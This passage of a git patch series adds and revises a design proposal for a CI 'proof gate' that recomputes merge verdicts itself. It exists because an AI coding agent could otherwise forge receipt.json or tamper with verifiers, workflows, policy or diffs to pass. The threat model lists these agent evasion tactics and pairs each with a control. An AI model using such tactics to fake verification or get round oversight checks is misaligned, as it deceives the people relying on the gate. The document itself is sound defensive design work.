From 0dc69255e1cba6916c08b22e8187cfe5a4123c9c Mon Sep 17 00:00:00 2001 From: "Kirill D." Date: Sun, 28 Jun 2026 12:59:40 -0600 Subject: [PATCH 01/11] docs: add Tier 3 Independent Evidence Runner plan (proposal, no code) Plan-only design for the CI-side evidence runner. Verdict is computed only by an adjudicator job that re-runs verification from base-SHA inputs; everything from the agent environment is untrusted telemetry. Includes threat model, repository-hardening prerequisite (protected branch + required check + CODEOWNERS), exact base/head handling, the HUMAN_APPROVAL_REQUIRED lifecycle, and 17 acceptance tests. Not implemented; for review on this branch only. Co-Authored-By: Claude Opus 4.7 --- docs/proposals/tier3-evidence-runner-plan.md | 462 +++++++++++++++++++ 1 file changed, 462 insertions(+) create mode 100644 docs/proposals/tier3-evidence-runner-plan.md diff --git a/docs/proposals/tier3-evidence-runner-plan.md b/docs/proposals/tier3-evidence-runner-plan.md new file mode 100644 index 0000000..9fbda98 --- /dev/null +++ b/docs/proposals/tier3-evidence-runner-plan.md @@ -0,0 +1,462 @@ +# Tier 3 - Independent Evidence Runner (PLAN ONLY, no code yet) + +Date: 2026-06-28. Status: design for review on the `tier3-plan` branch / Draft PR. +NOT merged to main. Nothing in this file is implemented. + +## The problem this fixes (grounded in the current code) + +Today the trust chain has a hole that the marketing copy must not overstate: + +- `runcap ci` (bin/runcap.mjs:312-339) reads an existing `receipt.json` and runs + `evaluatePolicyVerdict(receipt, policy)`. It only re-derives the PASS/BLOCKED + **logic** from the committed policy. It does **not** re-run any verification. +- The integrity FACTS it grades on - `receipt.verificationIntegrity.status`, + `receipt.outcome`, `integrity.violations` (scope), `receipt.cost.*` - are all + produced by `runOutcome` (mission-control.mjs:158) on the **agent's machine**. +- The clean-worktree replay (`verifyInCleanWorktree`, mission-control.mjs:497) + DOES exist, but it runs in the agent environment, takes `baselineCommit` from a + contract frozen in that same environment, and copies `changedFiles` out of the + agent's own working tree. Every input is attacker-controllable if the attacker + is the agent that owns the machine. + +Net: an agent that controls its environment can write a `receipt.json` that says +`verificationIntegrity.status: "VERIFIED_STRONG"` / `outcome: "verified"`, and +`runcap ci` will faithfully grade it **PASS**. The verdict logic is trustworthy; +the evidence feeding it is not. + +**Tier 3 goal:** the verdict and every integrity fact behind it are computed in +CI by **Job B re-running the verification itself** from inputs read at the PR's +**base SHA**, never from anything produced in the agent environment. After Tier 3 +this sentence is literally true (today half true): + +> The agent may write the change. It cannot control the environment that decides +> whether the change is merge-eligible. + +--- + +## Trust assertions (the requirements, explicit and load-bearing) + +This section is the contract the rest of the plan must satisfy. Each is testable. + +1. **Everything from the agent environment is telemetry only.** Job B does not + trust `evidence.json`, the agent `receipt.json`, any `status`, any integrity + fact, **or any raw exit code** originating in the agent environment or in Job A. + Every such value is carried with `trust: untrusted` and `grades_verdict: false`. + The PASS/BLOCKED verdict rests **only on a verification replay Job B performs + itself** (baseline run + post-change run from base-pinned inputs). Job A's + output is retained for display and debugging, never to move the gate. (See + "Why Job A still exists" below for why a powerless executor is kept at all.) +2. **Job B sources truth itself.** Job B reads `base.sha` and `head.sha` from the + trusted GitHub PR event, reads policy + verifier + protected list via `git show + :`, and computes the diff `base..head` itself. None of these + come from Job A or from the receipt. +3. **No `pull_request_target` to run candidate code.** The trigger is + `pull_request`. `pull_request_target` would expose base-repo secrets to a + context influenced by the PR - forbidden. +4. **Job B never executes PR-controlled workflow, policy, verifier, package + scripts, actions or config.** Job B evaluates candidate code only under a + **base-pinned** policy, verifier and dependency graph: the verify command, its + files, `package.json`/lockfile, the workflow and action are all taken at the + base SHA. The candidate's in-scope code blobs are applied into a clean base + worktree and run *by the base-pinned verifier*. A PR that would change *how* it + is tested (verifier/harness/scripts/workflow/policy) never reaches replay - it + is gated (req. 5). +5. **Rule/evidence changes -> HUMAN_APPROVAL_REQUIRED.** If the diff touches + `.runcap/mission.yaml|yml|json`, `.github/workflows/**`, the verify command's + files, or any `verification.protect` path, the verdict is + `HUMAN_APPROVAL_REQUIRED` (a change to the rules cannot be auto-graded by those + same new rules). Lifecycle defined in its own section below. +6. **Verdict separates the two evidence sources visibly.** The verdict prints two + labelled sections: **Code evidence: recomputed by CI** (baseline/replay, + integrity status, scope, gate - the only thing that grades) and **Agent-side + telemetry: untrusted** (cost, models, calls, the agent receipt's claimed status, + and Job A's reported exit codes - all clearly marked advisory/untrusted-for-grading). +7. **Forged-evidence acceptance test exists.** A test feeds Job B a malicious + `evidence.json` (and a malicious receipt) asserting `VERIFIED_STRONG`/PASS while + the real situation is a failing/out-of-scope/tampered change; Job B ignores the + forged values and still reaches its own correct verdict from its own replay. + +--- + +## Threat model + +### Asset +The **merge-eligibility verdict** (PASS / BLOCKED / HUMAN_APPROVAL_REQUIRED) and +the integrity facts behind it (baseline-failure, verifier-unchanged, scope, +clean-replay result) - all as computed by Job B's own replay. + +### Trust boundary +UNTRUSTED: the PR head workspace, the agent `receipt.json`, Job A's entire output +(including its exit codes), and any SHA carried in an artifact or receipt. +TRUSTED: content read at the target branch **base SHA**, the GitHub PR event's +`base.sha`/`head.sha`, and the pinned action commit SHA. + +### Adversary +A capable AI coding agent (or malicious human) that authored the PR and fully +controls the head commit and head workspace, and can write any file it likes +(including a plausible `evidence.json`/`raw-primitives.json` if it could reach the +artifact channel). + +### Why Job A still exists (a powerless executor, not a trusted one) +Job A runs the candidate code in a powerless, secret-free place and is kept +**only** for telemetry/debugging. It is NOT kept to keep untrusted execution off +Job B's runner - Job B runs candidate code too (under base-pinned inputs). Job A's +sole value is being a cheap, isolated, secret-free place to capture what the +agent's own environment produces (cost, the agent's claimed exit codes) for the +side-by-side display in req. 6. **Nothing Job A emits grades the verdict.** If +Job A were deleted entirely, the verdict would be unchanged. This is the +correction over earlier drafts: there is no "irreducible primitive" that must +cross the boundary to decide PASS/BLOCKED. The only thing that decides PASS/BLOCKED +is Job B's own replay of the base-pinned verifier against base+allowed-diff. + +### Attacks in scope, and the control that defeats each +1. **Forged receipt or forged evidence.json** claiming VERIFIED_STRONG -> Job B + ignores all agent/Job-A facts (telemetry only); recomputes from base SHA by + running its own replay. Real failing/out-of-scope change -> BLOCKED. +2. **Tampered verifier / test / package scripts** -> diff touches verifier or a + protect path -> `HUMAN_APPROVAL_REQUIRED`; replay always uses base-SHA verifier + and base-SHA package scripts/lockfile. +3. **Tampered policy / workflow / action** -> diff touches policy, + `.github/workflows/**`, or the action config -> `HUMAN_APPROVAL_REQUIRED`. +4. **Out-of-scope edit** -> Job B's own diff/scope check -> BLOCKED. +5. **Green depends on uncommitted local state** -> clean replay at base+allowed + diff fails to reproduce -> BLOCKED. +6. **Baseline already passing** -> Job B runs base-SHA verifier at base first; if + it already passes, STRONG is impossible (WEAK at best). +7. **Exfiltration / supply-chain via the verify step** -> neither job has secrets, + deployment creds, or `id-token`. Both are GitHub-hosted (req. below). Nothing to + steal, nothing to sign with. +8. **Artifact-channel poisoning** (agent overwrites/injects Job A's artifact) -> + irrelevant to the verdict: Job B never grades on Job A's artifact. A poisoned + artifact at most corrupts the untrusted-telemetry display, which is labelled + untrusted. The verdict is Job B's replay regardless. +9. **SHA confusion** (artifact/receipt carries a `base_sha`/`head_sha` to redirect + replay identity) -> Job B takes base/head only from the trusted PR event; + `GITHUB_SHA`/merge SHA is diagnostic only; a SHA from any artifact/receipt is + ignored. If trusted PR identity cannot be resolved -> BLOCKED. +10. **Diff-application smuggling** (symlink, file-mode/exec-bit flip, submodule + pointer, binary/`GIT_BINARY_PATCH`) used to apply something other than a plain + in-scope text blob -> Job B's diff applier rejects non-regular-file changes, + mode changes, submodule changes, and binary patches in the allowed set -> + BLOCKED (or HUMAN_APPROVAL_REQUIRED if it coincides with a protect/gated path). + +### Out of scope (named, deferred on purpose) +- Cryptographic signing / keyless attestation (Sigstore/OIDC) of the verdict. + Reason: it requires giving a job a signing identity, and we refuse to put any + signing capability in a job that runs PR-candidate code. Tier 3 trust = a + **protected GitHub workflow + required status check + CODEOWNERS** (CI-attested, + not crypto-attested - see prerequisite section). Signing gets its own threat + model next. +- Hardware/second-OS sandbox beyond the GitHub-hosted runner. +- Monorepo path-mapping nuance (single-package repo assumed for v1). + +--- + +## How does the evidence verdict become an unspoofable required PR check? + +A CI job that recomputes the verdict honestly is **not enough on its own**. If the +PR can edit the workflow that runs Job B, or swap the policy/verifier that Job B +pins to, then "Job B is independent" is false - the agent rewrites the judge. So +Tier 3's trust rests on a **repository-hardening prerequisite** that the product +must state plainly and verify, not assume: + +**v1 trust prerequisite (required, not optional):** +1. **Protected default branch** - no direct pushes; merges only via PR that passes + the required check. +2. **The Runcap check is marked Required** on the protected branch. +3. **CODEOWNERS ownership** of the trust surface, with required review from a human + code owner for any change to: + - `.github/workflows/**` (the workflow that runs Job A/Job B), + - `.runcap/mission.yaml|yml|json` (the policy), + - the verify command's own files, + - every `verification.protect` path. +4. **Action pinned by commit SHA** in the consumer workflow (provenance records the + resolved SHA; `@v1` is for humans). + +Without this, an agent's PR can change the rules in the same PR whose rules are +being graded. The CODEOWNERS + protected-branch combination is what makes +HUMAN_APPROVAL_REQUIRED meaningful: the gated change physically cannot merge until a +human code owner approves it. + +**Honesty rule for the product copy and the runner:** Runcap must NOT claim "the +runner is fully independent" in the absence of this hardening. At install time the +tool checks for the prerequisite and, if it is missing, reports +`INSTALLATION_NOT_HARDENED` (acceptance test below) rather than implying a +guarantee it cannot make. Detection is best-effort over what the GitHub API exposes +to a `contents: read` / `pull-requests: read` token (branch protection + required +checks where readable, presence of a CODEOWNERS file covering the trust paths); it +reports `INSTALLATION_NOT_HARDENED` when it cannot positively confirm the +prerequisite, and never reports "hardened" by assumption. + +--- + +## Architecture: two GitHub-hosted jobs, verdict computed only by Job B's replay + +``` +PR opened/updated (on: pull_request <-- NOT pull_request_target) + | + v +[Job A: execute - TELEMETRY ONLY] GitHub-hosted; NO secrets, NO id-token, contents:read + - checkout base SHA (persist-credentials:false) + - run candidate code as the agent's env would + - emit telemetry.json: { agent_reported_exit, cost, models, calls } + (trust: untrusted, grades_verdict: false - NOTHING here grades) + | (artifact = UNTRUSTED, display-only) + v +[Job B: adjudicate - GitHub-hosted only, NO secrets/id-token/deploy creds] + needs: Job A (only to attach its telemetry to the report) + - read base.sha / head.sha from the trusted GitHub PR event (NOT GITHUB_SHA, + NOT any artifact/receipt SHA); if unresolved -> BLOCKED + - read policy + verifier + protected + package scripts/lockfile @ base SHA + (git show base:path) + - compute diff base..head itself + - GATE: diff touches policy/workflow/verifier/protected/action + -> HUMAN_APPROVAL_REQUIRED + - compute scope (allow/protect) itself + - apply ONLY plain in-scope text blobs into a clean base worktree; reject + symlink / mode-change / submodule / binary-patch smuggling -> BLOCKED + - RUN the base-pinned verifier itself: baseline (pre-change) + replay + (post-change). THIS is the only thing that grades. + - derive integrity_status from Job B's own two runs + - evaluatePolicyVerdict over B's recomputed facts (NOT artifact/receipt) + - print verdict: two sections (code evidence: recomputed | agent telemetry: untrusted) + - write PR check + $GITHUB_STEP_SUMMARY + provenance + - exit non-zero on BLOCKED / HUMAN_APPROVAL_REQUIRED -> required check fails PR +``` + +Why both jobs are GitHub-hosted with no privilege: Job A runs untrusted candidate +code, so it is stripped of all authority and secrets. Job B *also* runs candidate +code (under base-pinned inputs), so it too must be GitHub-hosted only - **no +self-hosted runner, no secrets, no `id-token`, no deployment credentials, no shared +privileged cache** that a prior PR could have poisoned. The only authority Job B +holds is posting a status, granted by the protected-workflow + required-check +prerequisite, not by a secret. In v1 there is **no signing secret in either job**. + +--- + +## Base / head handling (exact) + +- **base SHA** = `github.event.pull_request.base.sha`, taken **only** from the + trusted GitHub PR event. All TRUSTED inputs read here. +- **head SHA** = `github.event.pull_request.head.sha`, taken **only** from the + trusted GitHub PR event. UNTRUSTED content, trusted identity. +- **`GITHUB_SHA` / the merge commit SHA** = diagnostic/provenance only; never used + to select replay identity. +- **No SHA from an artifact or receipt** can influence replay identity. A + `base_sha`/`head_sha` appearing in `evidence.json`/`receipt.json` is ignored. +- **If trusted PR identity is unresolved** (event payload missing/ambiguous, e.g. + the workflow was triggered in a context without a `pull_request` event) -> the + verdict is **BLOCKED** (fail closed). Replay never runs against an unverified + identity. +- **diff** = `git diff --name-status ..`, computed by Job B. + Never taken from `receipt.changedFiles` or from Job A. +- **policy / verifier / protected / package scripts + lockfile** = `git show + :`. Never from the post-head working tree. +- **action commit** = consumer workflow pins the Runcap action by **commit SHA**; + Job B records the resolved SHA in provenance. +- **applied changes** = for each `base..head` path matching `allow` AND not + matching `protect` AND not a gated path AND that is a plain regular-file text + change (no symlink, no mode change, no submodule, no binary patch), the **head** + blob is applied into the clean base worktree. Anything else -> BLOCKED. + +--- + +## HUMAN_APPROVAL_REQUIRED (third verdict state) - exact lifecycle + +`evaluatePolicyVerdict` today returns `PASS | BLOCKED`. Tier 3 adds +`HUMAN_APPROVAL_REQUIRED`, emitted by Job B's gate when the diff touches: +`.runcap/mission.yaml|yml|json`, `.github/workflows/**`, the verify command's own +files, or any `verification.protect` path. + +- **Does it block?** Yes. It is a non-PASS state; the required check exits non-zero, + so the PR cannot auto-merge. Distinct from BLOCKED ("ran and failed the rules") + in meaning and message, but identical in merge effect: not mergeable as-is. +- **Who approves?** A human **code owner** of the touched trust path (via the + CODEOWNERS prerequisite). Approval is a GitHub PR review approval from that code + owner - i.e. it happens in GitHub's protected-branch machinery, not inside + Runcap. Runcap does not grant the approval; it only refuses to auto-grade. +- **How does a legitimate policy/verifier update eventually pass?** The code owner + reviews and approves the PR in GitHub. On a protected branch configured so that + the required code-owner review + the required check together gate merge, the + approved PR becomes mergeable: the **new** policy/verifier is now the base for all + *subsequent* PRs, which Job B will pin to going forward. The gated PR itself + merges on human authority (the rules cannot grade their own change); every PR + after it is auto-graded against the now-updated, human-approved base. This is the + intended escape hatch: rules evolve, but only through a human code owner, never + through the agent that benefits from the change. + +Required check fails the PR for both non-PASS states. + +--- + +## Inputs / outputs (contracts) + +### Job A output: `telemetry.json` (NO verdict, NO trusted facts) +```jsonc +{ + "schema": "runcap.ci-telemetry/v1", + "trust": "untrusted", + "grades_verdict": false, + "agent_reported_baseline_exit": 1, // DISPLAY ONLY - never grades + "agent_reported_replay_exit": 0, // DISPLAY ONLY - never grades + "observed_cost_usd": 0.0007, + "models": ["gpt-4o"], + "llm_calls": 3 +} +``` +Hard rule: Job A computes no integrity status, no scope, no verdict. Every field is +display-only. If Job A emits a `verdict`/`status`/`integrity_status` field, Job B +ignores it. Deleting Job A entirely would not change any verdict. + +### Job B output: the verdict (two visibly separated evidence sources, req. 6) +```jsonc +{ + "schema": "runcap.ci-verdict/v1", + "verdict": "PASS|BLOCKED|HUMAN_APPROVAL_REQUIRED", + "reasons": [ "..." ], + "truth": "calculated_in_ci_from_base_sha_inputs_by_job_b_replay", + "code_evidence": { // recomputed by CI - the ONLY thing that grades + "source": "recomputed_by_ci_from_base_sha", + "grades_verdict": true, + "integrity_status": "VERIFIED_STRONG|VERIFIED_WEAK|UNVERIFIED|VERIFIER_COMPROMISED", + "baseline_passed": false, "replay_passed": true, + "scope_violations": [], "gate": { "triggered": false, "reason": null }, + "diff_application": "ok" // or "rejected: symlink|mode|submodule|binary" + }, + "agent_telemetry": { // untrusted - display only + "source": "agent_environment_and_job_a", + "trust": "untrusted", + "grades_verdict": false, + "agent_claimed_status": "VERIFIED_STRONG", // shown, never trusted + "agent_reported_exits": { "baseline": 1, "replay": 0 }, + "observed_cost_usd": 0.0007, "models": ["gpt-4o"], "llm_calls": 3 + }, + "hardening": { // the prerequisite check (req. / section above) + "status": "HARDENED|INSTALLATION_NOT_HARDENED", + "protected_branch": true, "required_check": true, + "codeowners_covers_trust_paths": true, "action_pinned_by_sha": true + }, + "provenance": { + "base_sha": "...", "head_sha": "...", "policy_hash": "...", + "action_sha": "...", "workflow_run_id": "...", "job_id": "...", + "github_sha_diagnostic": "..." // recorded, NOT used for replay identity + } +} +``` +`agent_telemetry.grades_verdict` is permanently `false`: cost and the agent's +claimed status/exits are retained and displayed but can never move the gate. (Budget +*limits* are still enforced at run time by the gateway 429 and recorded; but the CI +verdict's integrity does not depend on any agent-reported number or exit code.) + +### Permissions (the load-bearing posture) +```yaml +on: pull_request # req. 3 - NOT pull_request_target +permissions: + contents: read # read-only + pull-requests: write # Job B only, to post the check/summary + id-token: none # NO OIDC / no signing capability (both jobs) +# GitHub-hosted runners only (both jobs); no self-hosted runner; +# no secrets exposed to either job; no deployment creds; no shared privileged cache +``` + +--- + +## Acceptance tests (all must pass before Tier 3 ships) + +Extend the existing `check(name, pass)` style. CI logic is exercised by driving +the future `runcap ci --mode execute` (Job A telemetry) and `--mode adjudicate` +(Job B verdict) against fixtures in temp git repos with a real base/head. + +1. **Forged receipt is ignored.** Head workspace has a hand-written `receipt.json` + = VERIFIED_STRONG/verified, but the diff does not fix the failing task. -> Job B + recomputes via its own replay -> UNVERIFIED -> **BLOCKED**; the receipt's claimed + status appears only under `agent_telemetry`, never in the grading path. +2. **Forged Job-A artifact is ignored (req. 7, the headline test).** Feed Job B a + malicious `telemetry.json` claiming `agent_reported_replay_exit: 0` and a + `status: "VERIFIED_STRONG"` field, while the real replay fails. -> Job B's own + replay decides -> **BLOCKED**; assert the forged values appear only under + `agent_telemetry` and never in `code_evidence` or `reasons`. +3. **Verifier change -> human gate.** Diff edits the verify file / a `protect` + path -> `HUMAN_APPROVAL_REQUIRED`, reason names the path; required check fails. +4. **Policy change -> human gate.** Diff edits `.runcap/mission.yaml` + -> `HUMAN_APPROVAL_REQUIRED`. +5. **Workflow change -> human gate.** Diff edits `.github/workflows/*.yml` + -> `HUMAN_APPROVAL_REQUIRED`. +6. **Honest allowed diff -> PASS.** Diff entirely within `allow`; baseline verify + fails (real task); Job B's replay passes from base+allowed diff -> `VERIFIED_STRONG` + -> **PASS**. +7. **Out-of-scope diff -> BLOCKED.** Diff includes a path outside `allow` (not a + gated path) -> scope_violations non-empty -> **BLOCKED**. +8. **Baseline already passes -> no strong proof.** Verifier passes at base SHA + before any change -> integrity capped at `VERIFIED_WEAK`; STRONG impossible. +9. **Replay fails in clean CI -> BLOCKED.** Pass existed only in the agent's dirty + tree; clean base+allowed-diff replay fails -> **BLOCKED**. +10. **Cost/exit telemetry retained, cannot grade (req. 6).** Receipt/telemetry + carries a cost/model/exit block; assert it appears under `agent_telemetry` with + `grades_verdict:false`, and that mutating it (cost -> $0, cost -> $9999, or + flipping `agent_reported_replay_exit`) does NOT change the verdict for any + fixture above. +11. **Verdict shows both sources separately (req. 6).** Assert the rendered verdict + contains a "Code evidence: recomputed by CI" section and an "Agent-side + telemetry: untrusted" section, distinctly labelled. +12. **Provenance recorded (req. 2).** Verdict JSON has base_sha, head_sha, + policy_hash, action_sha, workflow_run_id, job_id; `truth` = + `calculated_in_ci_from_base_sha_inputs_by_job_b_replay`; `github_sha_diagnostic` + present but unused for replay identity. +13. **No-authority posture (static check, req. 3 + both-jobs safety).** A lint/test + asserts the shipped workflow template uses `pull_request` (not + `pull_request_target`), sets `id-token` absent/none, exposes no `secrets:` to + either job, and uses GitHub-hosted runners only (no `runs-on: self-hosted`). +14. **SHA cannot be redirected by artifact/receipt (req. / base-head section).** + Feed Job B a `receipt.json`/`telemetry.json` carrying a different + `base_sha`/`head_sha`; assert replay uses the PR-event SHAs and the artifact + SHAs are ignored. Separately: simulate an unresolved PR identity (no + `pull_request` event payload) -> **BLOCKED** (fail closed). +15. **Diff-smuggling rejected.** Four sub-fixtures, each an in-`allow` path that is + NOT a plain text blob: (a) a symlink, (b) an exec-bit/mode change, (c) a + submodule pointer change, (d) a binary patch. Each -> Job B's applier rejects it + -> **BLOCKED** with `code_evidence.diff_application` naming the reason. +16. **Un-hardened installation is reported, not silently trusted.** Run the adjudicator + against a repo whose branch protection / required check / CODEOWNERS prerequisite + is absent -> verdict carries `hardening.status: "INSTALLATION_NOT_HARDENED"`, and + the tool does NOT print any "fully independent / unspoofable" guarantee. (Whether + this also forces a non-PASS is a product decision flagged for Kirill in the PR; + default proposal: surface it loudly as a warning on PASS, and document that the + guarantee holds only when `HARDENED`.) +17. **HUMAN_APPROVAL_REQUIRED lifecycle.** A gated-path diff -> verdict + `HUMAN_APPROVAL_REQUIRED`, required check non-zero (does not auto-merge); the + reason explains a human code owner must approve; assert the message names the + gated path and does NOT imply Runcap itself can grant approval. + +--- + +## What changes in code (for the LATER build step, NOT now) + +Listed so the plan is actionable; not to be implemented until approved: +- `evaluatePolicyVerdict`: add `HUMAN_APPROVAL_REQUIRED`; grade off a passed-in + **CI-recomputed evidence** object built from Job B's own replay, never the agent + receipt or Job A artifact fields. Keep the receipt path only for the local + `mission run` developer loop, clearly labelled "local, advisory." +- New CI evidence builder (Job B core): port `freezeTaskContract` + + `checkVerificationIntegrity` + `verifyInCleanWorktree` logic to source ALL + inputs from base SHA, compute the diff itself, reject diff-smuggling, and run the + baseline + replay itself. This is the heart of Tier 3. +- Diff applier with a hard allowlist of change kinds (regular-file text blobs only). +- Hardening detector: best-effort read of branch protection / required check / + CODEOWNERS coverage -> `HARDENED | INSTALLATION_NOT_HARDENED`. +- `runcap ci` gains `--mode execute` (Job A telemetry) and `--mode adjudicate` + (Job B verdict). The composite `action.yml` wires both jobs with the permissions + block above, GitHub-hosted only. +- Ship a hardened reference workflow template + a sample CODEOWNERS; document + "protect the default branch; mark the check Required; own the trust paths via + CODEOWNERS; pin the action by commit SHA." + +--- + +## Stop line + +After Tier 3 (CI-attested verdict via protected workflow + required check + +CODEOWNERS, verdict computed only by Job B's own replay), the product is a coherent +**proof gate** for public launch and design partners. Do NOT add in this scope: +cryptographic signing/keyless attestation (own threat model, next), orchestration, +benchmark/model-ranking, or a SaaS dashboard. From 07e681673d6eca1911b4a80d8cfda1ff5b346835 Mon Sep 17 00:00:00 2001 From: "Kirill D." Date: Sun, 28 Jun 2026 13:10:54 -0600 Subject: [PATCH 02/11] docs: revise Tier 3 plan per review (single required gate, fail-closed hardening) Apply 13 review corrections to the proposal (still no code): - Required Proof Gate is one self-sufficient adjudicator job; no `needs:` on any untrusted executor; agent telemetry is optional/advisory only. - Three distinct non-PASS states with exact exit semantics: BLOCKED (non-zero), HUMAN_APPROVAL_REQUIRED (success/neutral; CODEOWNER gates merge), INSTALLATION_NOT_HARDENED (fail closed, never PASS). - Minimal permissions: contents:read only; no PR comments in v1. - Base-freshness (branch up to date; no merge queue in v1), stale-approval dismissal, no-bypass; separate hardening configuration vs detection (HARDENING_UNVERIFIED, never infer HARDENED). - Rename claim to "protected CI-attested required check" (drop "unspoofable"). - Expanded diff rejection (A/M text only; reject D/R/C/T/symlink/mode/ submodule/binary/LFS); corrected exfiltration claim + hard timeout; base-pinned dependency-install contract (npm ci --ignore-scripts); honest budget scope; 9 new acceptance tests. Co-Authored-By: Claude Opus 4.7 --- docs/proposals/tier3-evidence-runner-plan.md | 661 ++++++++++--------- 1 file changed, 352 insertions(+), 309 deletions(-) diff --git a/docs/proposals/tier3-evidence-runner-plan.md b/docs/proposals/tier3-evidence-runner-plan.md index 9fbda98..776dc6f 100644 --- a/docs/proposals/tier3-evidence-runner-plan.md +++ b/docs/proposals/tier3-evidence-runner-plan.md @@ -25,9 +25,9 @@ Net: an agent that controls its environment can write a `receipt.json` that says the evidence feeding it is not. **Tier 3 goal:** the verdict and every integrity fact behind it are computed in -CI by **Job B re-running the verification itself** from inputs read at the PR's -**base SHA**, never from anything produced in the agent environment. After Tier 3 -this sentence is literally true (today half true): +CI by **a single adjudicator job re-running the verification itself** from inputs +read at the PR's **base SHA**, never from anything produced in the agent +environment. After Tier 3 this sentence is literally true (today half true): > The agent may write the change. It cannot control the environment that decides > whether the change is merge-eligible. @@ -38,199 +38,197 @@ this sentence is literally true (today half true): This section is the contract the rest of the plan must satisfy. Each is testable. -1. **Everything from the agent environment is telemetry only.** Job B does not - trust `evidence.json`, the agent `receipt.json`, any `status`, any integrity - fact, **or any raw exit code** originating in the agent environment or in Job A. - Every such value is carried with `trust: untrusted` and `grades_verdict: false`. - The PASS/BLOCKED verdict rests **only on a verification replay Job B performs - itself** (baseline run + post-change run from base-pinned inputs). Job A's - output is retained for display and debugging, never to move the gate. (See - "Why Job A still exists" below for why a powerless executor is kept at all.) -2. **Job B sources truth itself.** Job B reads `base.sha` and `head.sha` from the - trusted GitHub PR event, reads policy + verifier + protected list via `git show - :`, and computes the diff `base..head` itself. None of these - come from Job A or from the receipt. -3. **No `pull_request_target` to run candidate code.** The trigger is - `pull_request`. `pull_request_target` would expose base-repo secrets to a - context influenced by the PR - forbidden. -4. **Job B never executes PR-controlled workflow, policy, verifier, package - scripts, actions or config.** Job B evaluates candidate code only under a +1. **The required Proof Gate is one self-sufficient job.** Tier 3 v1 is a single + required job (the adjudicator). It does not depend on any job that runs untrusted + candidate code as a precondition (`needs:`), so untrusted code cannot make the + gate skip or pass by crashing/skipping a job it depends on. +2. **Everything from the agent environment is optional advisory telemetry.** The + receipt, gateway cost, model/call counts, agent-claimed status, and any agent or + side-job exit codes are `trust: untrusted` / `grades_verdict: false`. They may be + *displayed* later as advisory data; they are **never a workflow dependency** and + **never influence the outcome**. The verdict rests only on the adjudicator's own + replay. +3. **The adjudicator sources truth itself.** It reads `base.sha`/`head.sha` from the + trusted GitHub PR event, reads policy + verifier + dependency manifest/lockfile + + protected list via `git show :`, and computes the diff + `base..head` itself. None of these come from any artifact or the receipt. +4. **No `pull_request_target`.** Trigger is `pull_request`. `pull_request_target` + would expose base-repo secrets to a PR-influenced context - forbidden. +5. **The adjudicator never executes PR-controlled workflow, policy, verifier, + package scripts, actions or config.** It evaluates candidate code only under a **base-pinned** policy, verifier and dependency graph: the verify command, its - files, `package.json`/lockfile, the workflow and action are all taken at the - base SHA. The candidate's in-scope code blobs are applied into a clean base - worktree and run *by the base-pinned verifier*. A PR that would change *how* it - is tested (verifier/harness/scripts/workflow/policy) never reaches replay - it - is gated (req. 5). -5. **Rule/evidence changes -> HUMAN_APPROVAL_REQUIRED.** If the diff touches + files, `package.json`/lockfile, package-manager command, the workflow and action + are all taken at the base SHA. Candidate in-scope code blobs are applied into a + clean base worktree and run *by the base-pinned verifier*. A PR that would change + *how* it is tested is gated (req. 7). +6. **Verdict separates the two evidence sources visibly.** Two labelled sections: + **Code evidence: recomputed by CI** (baseline/replay, integrity status, scope, + gate - the only thing that grades) and **Agent-side telemetry: untrusted, + advisory** (cost, models, calls, claimed status/exits - never grades). +7. **Rule/evidence changes -> HUMAN_APPROVAL_REQUIRED.** If the diff touches `.runcap/mission.yaml|yml|json`, `.github/workflows/**`, the verify command's - files, or any `verification.protect` path, the verdict is - `HUMAN_APPROVAL_REQUIRED` (a change to the rules cannot be auto-graded by those - same new rules). Lifecycle defined in its own section below. -6. **Verdict separates the two evidence sources visibly.** The verdict prints two - labelled sections: **Code evidence: recomputed by CI** (baseline/replay, - integrity status, scope, gate - the only thing that grades) and **Agent-side - telemetry: untrusted** (cost, models, calls, the agent receipt's claimed status, - and Job A's reported exit codes - all clearly marked advisory/untrusted-for-grading). -7. **Forged-evidence acceptance test exists.** A test feeds Job B a malicious - `evidence.json` (and a malicious receipt) asserting `VERIFIED_STRONG`/PASS while - the real situation is a failing/out-of-scope/tampered change; Job B ignores the - forged values and still reaches its own correct verdict from its own replay. + files, the dependency manifest/lockfile, or any `verification.protect` path, the + verdict is `HUMAN_APPROVAL_REQUIRED` (a change to the rules cannot be auto-graded + by those same new rules). Exact lifecycle + exit semantics below. +8. **Forged-evidence acceptance test exists.** A test feeds the adjudicator a + malicious `evidence.json`/receipt asserting `VERIFIED_STRONG`/PASS while the real + situation fails; the adjudicator ignores the forged values and still reaches its + own correct verdict from its own replay. --- ## Threat model ### Asset -The **merge-eligibility verdict** (PASS / BLOCKED / HUMAN_APPROVAL_REQUIRED) and -the integrity facts behind it (baseline-failure, verifier-unchanged, scope, -clean-replay result) - all as computed by Job B's own replay. +The **merge-eligibility verdict** (PASS / BLOCKED / HUMAN_APPROVAL_REQUIRED / +INSTALLATION_NOT_HARDENED) and the integrity facts behind it (baseline-failure, +verifier-unchanged, scope, clean-replay result) - all as computed by the +adjudicator's own replay. ### Trust boundary -UNTRUSTED: the PR head workspace, the agent `receipt.json`, Job A's entire output -(including its exit codes), and any SHA carried in an artifact or receipt. -TRUSTED: content read at the target branch **base SHA**, the GitHub PR event's -`base.sha`/`head.sha`, and the pinned action commit SHA. +UNTRUSTED: the PR head workspace, the agent `receipt.json`, any side-job/artifact +output, and any SHA carried in an artifact or receipt. TRUSTED: content read at the +target branch **base SHA**, the GitHub PR event's `base.sha`/`head.sha`, and the +pinned action commit SHA. ### Adversary A capable AI coding agent (or malicious human) that authored the PR and fully -controls the head commit and head workspace, and can write any file it likes -(including a plausible `evidence.json`/`raw-primitives.json` if it could reach the -artifact channel). - -### Why Job A still exists (a powerless executor, not a trusted one) -Job A runs the candidate code in a powerless, secret-free place and is kept -**only** for telemetry/debugging. It is NOT kept to keep untrusted execution off -Job B's runner - Job B runs candidate code too (under base-pinned inputs). Job A's -sole value is being a cheap, isolated, secret-free place to capture what the -agent's own environment produces (cost, the agent's claimed exit codes) for the -side-by-side display in req. 6. **Nothing Job A emits grades the verdict.** If -Job A were deleted entirely, the verdict would be unchanged. This is the -correction over earlier drafts: there is no "irreducible primitive" that must -cross the boundary to decide PASS/BLOCKED. The only thing that decides PASS/BLOCKED -is Job B's own replay of the base-pinned verifier against base+allowed-diff. +controls the head commit and head workspace, and can write any file it likes. The +guarantee holds only against PR authors **without** branch-protection or ruleset +**bypass** authority (see no-bypass requirement); an actor who can bypass branch +protection is out of scope. ### Attacks in scope, and the control that defeats each -1. **Forged receipt or forged evidence.json** claiming VERIFIED_STRONG -> Job B - ignores all agent/Job-A facts (telemetry only); 